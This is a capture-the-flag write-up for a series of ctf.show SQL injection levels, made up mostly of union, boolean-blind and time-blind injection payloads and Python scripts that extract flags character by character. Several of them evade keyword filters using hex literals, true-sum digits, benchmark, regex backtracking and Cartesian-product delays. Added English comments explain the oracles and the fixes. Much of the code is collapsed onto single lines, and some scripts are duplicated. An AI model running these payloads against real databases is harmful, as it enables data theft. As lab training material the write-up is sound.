1' union all select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(group_concat(table_name),1,'numA'),2,'numB'),3,'numC'),4,'numD'),5,'numE'),6,'numF'),7,'numG'),8,'numH'),9,'numI'),'0','numJ') from information_schema.tables where table_schema=database() %23
查字段名
1' union all select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(group_concat(column_name),1,'numA'),2,'numB'),3,'numC'),4,'numD'),5,'numE'),6,'numF'),7,'numG'),8,'numH'),9,'numI'),'0','numJ') from information_schema.columns where table_schema=database() and table_name='ctfshow_user4' %23
查结果
1' union select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,1,'numA'),2,'numB'),3,'numC'),4,'numD'),5,'numE'),6,'numF'),7,'numG'),8,'numH'),9,'numI'),'0','numJ') from ctfshow_user4--+
# Time-based blind SQL injection PoC for the challenge's /api/v5.php endpoint (the whole
# script was collapsed onto one line by extraction; `dict` shadows the builtin).
# The oracle is latency: the injected `if(...,sleep(3),0)` delays the reply only when the
# guessed character `j` at position `i` matches, and the client accepts a guess when
# `end-start > 3`, appending one character to `flag` per outer iteration.
# NOTE(review): the threshold has no upper bound, so a slow network produces false
# positives. Server side, binding `id` as a query parameter removes the oracle; in access
# logs this technique shows as a burst of near-identical requests whose latency splits
# into two clusters (~0 s and ~3 s).
#-- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/30 # blog: gylq.gitee.io import requests import time url = "http://bab11107-9d31-46bf-b41e-0a04bb92b155.challenge.ctf.show:8080/api/v5.php" dict = "0123456789abcdefghijklmnopqrstuvwxyz{}-" flag ="" for i in range(1,50): for j in dict: payload= f"?id=1' and if(substr((select password from ctfshow_user5 where username=\"flag\"),{i},1)=\"{j}\",sleep(3),0)--+" res_get = url + payload start = time.time() res = requests.get(url=res_get) end = time.time() if end-start > 3: flag = flag + j print(flag) break
web176
发现是对select的过滤,但是没有过滤大小写
表
1' union all Select1,2,(Select table_name from information_schema.tables where table_schema=database()) --+
字段
1' union all Select1,2,(Selectgroup_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_user') --+
查flag
1' union all Select1,2,(Selectpasswordfrom ctfshow_user where username='flag') --+
# Boolean-based blind injection through the `tableName` POST field (collapsed onto one
# line by extraction; `requests` is imported outside this excerpt and `str` shadows the
# builtin). Each request guesses the next prefix `flag+j` with `like '...%'` and the
# oracle is the literal `$user_count = 1` appearing in the response body; the loop stops
# when `}` is appended.
# Defensive note: the table name is evidently spliced into the query verbatim; identifiers
# cannot be bound as parameters, so the fix is an allow-list of permitted table names.
url = "http://e9202b55-424f-460d-8597-692168ba560f.challenge.ctf.show:8080/select-waf.php" str = "0123456789abcdefghijklmnopqrstuvwxyz{}-" flag = "ctfshow" for i in range(0,666): print('[*] 开始盲注第{}位'.format(i)) for j in str: data = { "tableName":"(ctfshow_user)where(pass)like'{0}%'".format(flag+j) } res = requests.post(url,data) if res.text.find("$user_count = 1")>0: flag += j print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
web184
这把过滤了where,我们用右连接来做
ctfshow% 的十六进制 为 0x63746673686F7725
所以用他来匹配like,放出了空格
tableName=ctfshow_user as a right join ctfshow_user as b on b.pass like 0x63746673686F7725
# to_hex(s) -> str: UTF-8 encodes `s`, hex-encodes it with binascii.b2a_hex and returns the
# hex digits as a str (the `def` keyword and the function body were fused by extraction;
# `binascii` is imported outside this excerpt). Used below to express a LIKE pattern as a
# 0x... literal so the request carries neither quotes nor spaces.
defto_hex(s): #转十六进制 str_16 = binascii.b2a_hex(s.encode('utf-8')) res = bytes.decode(str_16) return res
# Same boolean-based prefix search as the previous level, but the `where` keyword is
# avoided by a self RIGHT JOIN whose ON condition carries the `like` test, and the pattern
# is sent as a 0x hex literal built by to_hex(). The oracle here is `$user_count = 43`
# in the response body (presumably the row count of the join when the condition holds —
# verify against the challenge output). `str` shadows the builtin.
url = "http://d42dba7c-384e-4a5d-9a5d-26398d42ce7c.challenge.ctf.show:8080/select-waf.php" str = "0123456789abcdefghijklmnopqrstuvwxyz{}-" flag = "ctfshow" for i in range(0,666): print('[*] 开始盲注第{}位'.format(i)) for j in str: result = "0x" + to_hex(flag + j + "%") data = { "tableName":"ctfshow_user as a right join ctfshow_user as b on b.pass like {0}".format(result) } res = requests.post(url,data) if"$user_count = 43"in res.text: flag += j print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
# tableName=ctfshow_user as a right join ctfshow_user as b on b.pass like 0x63746673686F7725
web185
这次直接过滤了 0-9 的所有数字,需要把上一个脚本改一下
这次我们利用 true 来替换数字
select true+true; 结果是2 所以我们构造数字c来进行like匹配
我们还是用 like 模糊匹配,然后利用 concat 连接由 true 构造出来的字符和数字
tableName=ctfshow_user as a right join ctfshow_user as b on b.pass like concat(char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+tru
e+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true),char(true+true+true+true+true+true+true+true+true
+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true+true))
# Digit-free variant of the prefix search: `change_str()` (defined outside this excerpt)
# rewrites `flag + j + "%"` as a `concat(char(true+true+...), ...)` expression so the
# request contains no 0-9 characters. `url` and `str` come from the earlier script; the
# oracle is again `$user_count = 43` in the response. The loop was collapsed onto one line.
flag = "ctfshow" for i in range(0,666): print('[*] 开始盲注第{}位'.format(i)) for j in str: result = change_str(flag + j + "%") data = { "tableName":"ctfshow_user as a right join ctfshow_user as b on b.pass like (concat({}))".format(result) } res = requests.post(url,data) if"$user_count = 43"in res.text: flag += j print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
# Second, byte-identical copy of the loop above (the writeup prints it twice).
flag = "ctfshow" for i in range(0,666): print('[*] 开始盲注第{}位'.format(i)) for j in str: result = change_str(flag + j + "%") data = { "tableName":"ctfshow_user as a right join ctfshow_user as b on b.pass like (concat({}))".format(result) } res = requests.post(url,data) if"$user_count = 43"in res.text: flag += j print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
# Loop fragment only: `payload`, `url`, `str` and `flag` are defined outside this excerpt.
# The guess goes in the `username` field and the oracle is the JSON-escaped string
# `\u67e5\u8be2\u5931\u8d25` ("查询失败") in the raw response text — the comparison is on
# the escaped form, so it only works while the server does not unescape its JSON.
# `ifr"..."in` is `if r"..." in` with the spaces lost in extraction.
for i in range(666): print('[*] 开始盲注第{}位'.format(i)) for j in str: data={ "username":payload.format(flag + j), "password":0 } res = requests.post(url,data) ifr"\u67e5\u8be2\u5931\u8d25"in res.text: flag += j print(flag) break if j=='}': print('[*] flag is {}'.format(flag)) exit()
# Boolean-based blind injection via the login `username` field; the previously tried
# payloads (table list, column list) are kept as comments and only the last `payload`
# assignment is live. The oracle is `\u5bc6\u7801\u9519\u8bef` ("密码错误") in the raw
# response: the injected condition being true makes the login reach the password check.
# NOTE(review): `range(0,666)` starts at 0, and substr with position 0 yields '' in MySQL,
# so the first request of each run can never match (harmless, just wasted). `n` counts
# recovered characters. `str` shadows the builtin; line collapsed by extraction.
#-- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/30 # blog: gylq.gitee.io import requests url = "http://17f404c9-b645-40ab-8daf-f60c335e2d84.challenge.ctf.show:8080/api/" str = "01234567890-=!@#$%^&*()_+`~ qwertyuiopasdfghjklzxcvbnm[];,./{}:<>?\|" flag = "" #查表 payload="admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',1,0)#" #查字段 payload="admin' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_fl0g'),{},1)='{}',1,0)#" payload="admin' and if(substr((select f1ag from ctfshow_fl0g),{},1)='{}',1,0)#" n=0 # admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',1,0)# for i in range(0,666): for j in str: data = { "username":payload.format(i,j), "password":123456 } res = requests.post(url,data) ifr"\u5bc6\u7801\u9519\u8bef"in res.text: flag += j n+=1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
# Second, byte-identical copy of the script above (the writeup prints it twice).
#-- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/30 # blog: gylq.gitee.io import requests url = "http://17f404c9-b645-40ab-8daf-f60c335e2d84.challenge.ctf.show:8080/api/" str = "01234567890-=!@#$%^&*()_+`~ qwertyuiopasdfghjklzxcvbnm[];,./{}:<>?\|" flag = "" #查表 payload="admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',1,0)#" #查字段 payload="admin' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_fl0g'),{},1)='{}',1,0)#" payload="admin' and if(substr((select f1ag from ctfshow_fl0g),{},1)='{}',1,0)#" n=0 # admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',1,0)# for i in range(0,666): for j in str: data = { "username":payload.format(i,j), "password":123456 } res = requests.post(url,data) ifr"\u5bc6\u7801\u9519\u8bef"in res.text: flag += j n+=1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
# Same boolean-based search as the previous level, but the oracle is read from the
# decoded JSON body (`res.json()['msg']` containing "密码错误") instead of the escaped raw
# text, so it keeps working if the server changes its JSON escaping.
# NOTE(review): `res.json()` raises on a non-JSON reply (e.g. an error page), which would
# abort the run instead of skipping that guess. `str` shadows the builtin.
#-- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/30 # blog: gylq.gitee.io import requests url = "http://8ab877db-cd5c-424f-bb9c-0f54ba6447c7.challenge.ctf.show:8080/api/" str = "01234567890-=!@#$%^&*()_+`~ qwertyuiopasdfghjklzxcvbnm[];,./{}:<>?\|" flag = "" #查表 payload="admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',1,0)#" #查字段 payload="admin' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_fl0g'),{},1)='{}',1,0)#" payload="admin' and if(substr((select f1ag from ctfshow_fl0g),{},1)='{}',1,0)#" n=0 # admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',1,0)# for i in range(0,666): for j in str: data = { "username":payload.format(i,j), "password":123456 } res = requests.post(url,data) if"密码错误"in res.json()['msg']: flag += j n+=1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
# Prefix search with `regexp('^{}')` instead of substr/position, so `payload.format(flag+j)`
# takes the whole prefix recovered so far and the outer `i` is only a retry counter.
# NOTE(review): `str` contains `(`, `)`, `{`, `}` and `-`, which are regex metacharacters
# inside `regexp('^...')`; an unbalanced `(` makes the pattern invalid and `{`/`}` (part of
# the flag format) may not match literally without escaping — confirm against the engine.
# Oracle is "密码错误" in the decoded JSON `msg`. Line collapsed by extraction.
#-- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/30 # blog: gylq.gitee.io import requests url = "http://131ffba2-a367-4469-8421-e4c0d9877e37.challenge.ctf.show:8080/api/" str = "01234567890qwertyuiopasdfghjklzxcvbnm{}-()_,," flag = "" #查表payload="admin' and if((select group_concat(table_name) from information_schema.tables where table_schema=database())regexp('^{}'), 1, 0)#" #查字段payload="admin' and if((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flxg')regexp('^{}'), 1, 0)#" payload="admin' and if((select group_concat(f1ag) from ctfshow_flxg)regexp('^{}'), 1, 0)#" n=0 # admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',1,0)# for i in range(0,666): for j in str: data = { "username":payload.format(flag+j), "password":123456 } res = requests.post(url,data) if"密码错误"in res.json()['msg']: flag += j n+=1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
# Second copy of the script above, identical apart from the challenge instance URL.
#-- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/30 # blog: gylq.gitee.io import requests url = "http://8f2766ad-af45-441e-b247-7a526b3d150f.challenge.ctf.show:8080/api/" str = "01234567890qwertyuiopasdfghjklzxcvbnm{}-()_,," flag = "" #查表payload="admin' and if((select group_concat(table_name) from information_schema.tables where table_schema=database())regexp('^{}'), 1, 0)#" #查字段payload="admin' and if((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flxg')regexp('^{}'), 1, 0)#" payload="admin' and if((select group_concat(f1ag) from ctfshow_flxg)regexp('^{}'), 1, 0)#" n=0 # admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',1,0)# for i in range(0,666): for j in str: data = { "username":payload.format(flag+j), "password":123456 } res = requests.post(url,data) if"密码错误"in res.json()['msg']: flag += j n+=1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j=="}": print('[*] flag is {}'.format(flag)) exit() break
web195
// Challenge source quoted by the writeup: `$username` is interpolated straight into the
// SQL string, and without surrounding quotes, so whatever the client sends becomes part
// of the statement itself. The fix is a prepared statement with `$username` bound as a
// parameter (PDO/mysqli prepare + execute); keyword deny-lists layered on top of string
// concatenation, as in the later levels, only relocate the problem.
//拼接sql语句查找指定ID用户 $sql = "select pass from ctfshow_user where username = {$username};";
from lib.core.compat import xrange from lib.core.enums import PRIORITY from lib.core.common import singleTimeWarnMessage from lib.core.enums import DBMS
from lib.core.compat import xrange from lib.core.enums import PRIORITY from lib.core.common import singleTimeWarnMessage from lib.core.enums import DBMS
# Time-based blind injection through the `ip` POST field (`debug` is sent as '0').
# Earlier payloads (database name, tables, columns) are kept as comments; the live one
# uses `sleep(5)`, and a guess is accepted when the round trip falls in (4.9, 6.9) s —
# the upper bound filters out stalls that are not the injected delay. `requests` and
# `time` are imported outside this excerpt; `str` shadows the builtin. The script was
# split over three lines by extraction.
url = "http://5eb465ee-6eeb-4508-9fea-5496e3ad2a8f.challenge.ctf.show:8080/api/" str = "01234567890qwertyuiopasdfghjklzxcvbnm{}-()_,," flag = ""
#payload = "if(substr(database(),{},1)='{}',sleep(3),0)" #payload = "if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',sleep(5),0)" #payload = "if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagx'),{},1)='{}',sleep(5),0)" payload = "if(substr((select group_concat(flaga) from ctfshow_flagx),{},1)='{}',sleep(5),0)" n = 0
# `print(end - start)` logs every round trip, which is how the timing window was tuned.
for i in range(0, 666): for j in str: data = { "ip": payload.format(i,j), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() print(end - start) if end - start > 4.9and end - start < 6.9: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
# Same time-based search as above with a quote-breaking prefix (`1' or ... #`), `sleep(3)`
# and an acceptance window of (2.9, 4.9) s. The last commented `payload` line is a leftover
# from the previous level. `requests`/`time` are imported outside this excerpt.
url = "http://fed15780-e37b-48e2-8e96-86d984f46b94.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = ""
#查数据库payload = "1' or if(substr(database(),{},1)='{}',sleep(3),0) #" #查表payload = "1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',sleep(3),0) #" #查字段payload = "1' or if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxc'),{},1)='{}',sleep(3),0) #" payload = "1' or if(substr((select group_concat(flagaa) from ctfshow_flagxc),{},1)='{}',sleep(3),0) #" #payload = "if(substr((select group_concat(flaga) from ctfshow_flagx),{},1)='{}',sleep(5),0)" n = 0
for i in range(0, 666): for j in str: data = { "ip": payload.format(i,j), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() if end - start > 2.9and end - start < 4.9: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
# Time-based search where the injected value starts with the literal `'MQ=='` (the
# challenge evidently compares against a base64 token — verify against its source) and
# uses `sleep(5)` with a (4.9, 6.9) s window. `requests`/`time` come from outside this
# excerpt; `str` shadows the builtin.
url = "http://83e21d02-6e3a-4c01-9016-79367bdcb966.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #'MQ==' or if(1=1,sleep(5),0) #payload = "'MQ==' or if(substr(database(),{},1)='{}',sleep(5),0) " #payload = "'MQ==' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',sleep(5),0) " #payload = "'MQ==' or if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxcc'),{},1)='{}',sleep(5),0) " payload = "'MQ==' or if(substr((select group_concat(flagaac) from ctfshow_flagxcc),{},1)='{}',sleep(5),0) " n = 0
for i in range(0, 666): for j in str: data = { "ip": payload.format(i,j), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() if end - start > 4.9and end - start < 6.9: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
web217
// waf() is a deny-list: it rejects input matching /sleep/i and nothing else. The next
// section of the writeup simply replaces sleep() with benchmark(), so the list would have
// to grow with every new delay primitive; a parameterised query fixes the root cause and
// makes the keyword check unnecessary.
//屏蔽危险分子 function waf($str){ return preg_match('/sleep/i',$str); }
# Time-based search that uses `benchmark(5000000,sha(1))` as the delay because the level's
# waf() rejects `sleep`. The acceptance window (1.4, 4.9) s is wide because a CPU-bound
# delay varies with server load, unlike a fixed sleep; `print(end-start)` is commented out.
# Extraction fused several tokens (`inrange`, `instr`, `ifend`, `andend`) and spread the
# script over three lines. Note the double slash in the URL path.
url = "http://fe186d5a-2385-43fd-8d4a-d557cc25b038.challenge.ctf.show:8080//api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #1 or if(substr(database(),{},1)='{}',benchmark(6666666,sha(1)),0) #payload = "1orif(substr(database(),{},1)='{}',benchmark(6666666,sha(1)),0)" #payload = "1) andif(substr((selectgroup_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',benchmark(5000000,sha(1)),0) #" #payload = "1) and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxccb'),{},1)='{}',benchmark(5000000,sha(1)),0) #" payload = "1) and if(substr((select group_concat(flagaabc) from ctfshow_flagxccb),{},1)='{}',benchmark(5000000,sha(1)),0) #"
n = 0
for i inrange(0, 666): for j instr: data = { "ip": payload.format(i,j), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() # print(end-start) ifend - start > 1.4andend - start < 4.9: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
# Time-based search whose delay is regex backtracking: `bypass` matches a long string
# built from sixteen rpad() calls against the nested pattern `(a.*)+...+b` with RLIKE,
# which the engine evaluates slowly, and the third `{}` in `payload` receives it. The
# acceptance window is (0.4, 1) s. The first `#` comment is the hand-built version of the
# payload used to calibrate the timing. `requests`/`time` are imported here; `str`
# shadows the builtin; the script spans three extracted lines.
# -- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/31 # blog: gylq.gitee.io import requests import time bypass="concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'" url = "http://4f04cb91-f6ed-43ce-bc4d-539d9c5b2a7b.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #1) and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',( concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),0)# #求表payload = "1) and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',({}),0)#" #payload = "1) and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxc'),{},1)='{}',({}),0)#" payload = "1) and if(substr((select group_concat(flagaac) from ctfshow_flagxc),{},1)='{}',({}),0)#"
n = 0
for i in range(0, 666): for j in str: data = { "ip": payload.format(i,j,bypass), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() if end - start > 0.4and end - start < 1: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break
web219
// Extended deny-list: /sleep|benchmark|rlike/i. The writeup's following section moves to
// a heavy Cartesian-product query that uses none of these words, illustrating why a
// keyword filter on concatenated SQL is not a boundary — bind the value as a parameter
// and, as defence in depth, apply a per-statement execution time limit server side.
//屏蔽危险分子 function waf($str){ return preg_match('/sleep|benchmark|rlike/i',$str); }
# Attempt at the level whose waf() rejects `rlike`: `bypass` is the previous regex-delay
# string with RLIKE replaced by LIKE. NOTE(review): LIKE is not a regex — `(a.*)+` is just
# literal text to it apart from `%`/`_` — so this expression produces no backtracking
# delay, and the tiny (0.22, 0.5) s window is largely measuring network jitter; the
# writeup itself switches to a Cartesian-product delay in the next script. The trailing
# `#ctfshow{...}` comment records the flag the author obtained.
# -- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/7/31 # blog: gylq.gitee.io import requests import time bypass="concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) LIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'" url = "http://ea12a2f3-655e-44f2-b249-a95701399f73.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #1) and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',( concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),0)# #payload = "1) and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',({}),0)#" #payload = "1) and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxca'),{},1)='{}',({}),0)#" payload = "1) and if(substr((select group_concat(flagaabc) from ctfshow_flagxca),{},1)='{}',({}),0)#"
n = 0
for i in range(0, 666): for j in str: data = { "ip": payload.format(i,j,bypass), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() print(end - start) if end - start > 0.22and end - start < 0.5: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break #ctfshow{92286539-ff05-4292-bcbf-7ff6fa6e31ab}
笛卡尔积(连接表是一个很耗时的操作):A×B 是 A 和 B 中每个元素的组合所组成的集合,也就是连接表。 SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C; select * from table_name A, table_name B; select * from table_name A, table_name B, table_name C; select count(*) from table_name A, table_name B, table_name C; 表可以是同一张表。
# Time-based search whose delay is a Cartesian product: `bypass` is a `select count(*)`
# over five information_schema tables joined without conditions, which the server must
# fully enumerate whenever the injected condition is true. Acceptance window (1.5, 5) s;
# the regex-delay comment and two earlier payloads are leftovers from the previous
# scripts. Defensive note: a per-statement execution time limit and read restrictions on
# information_schema for the application account blunt this class of delay.
# -- coding:UTF-8 -- # Author:孤桜懶契 # Date:2021/8/1 # blog: gylq.gitee.io import requests import time bypass="select count(*) from information_schema.schemata a, information_schema.tables b, information_schema.tables c, information_schema.schemata d, information_schema.schemata e" url = "http://ea12a2f3-655e-44f2-b249-a95701399f73.challenge.ctf.show:8080/api/" str = "01234567890abcdefghijklmnopqrstuvwxyz{}-()_,," flag = "" #1) and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='c',( concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),0)# #payload = "1) and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1)='{}',({}),0)#" #payload = "1) and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_flagxca'),{},1)='{}',({}),0)#" payload = "1) and if(substr((select group_concat(flagaabc) from ctfshow_flagxca),{},1)='{}',({}),0)#"
n = 0
for i in range(0, 666): for j in str: data = { "ip": payload.format(i,j,bypass), "debug": '0' } start = time.time() res = requests.post(url, data) end = time.time() print(end - start) if end - start > 1.5and end - start < 5: flag += j n += 1 print('[*] 开始盲注第{}位'.format(n)) print(flag) if j == "}": print('[*] flag is {}'.format(flag)) exit() break #ctfshow{92286539-ff05-4292-bcbf-7ff6fa6e31ab}
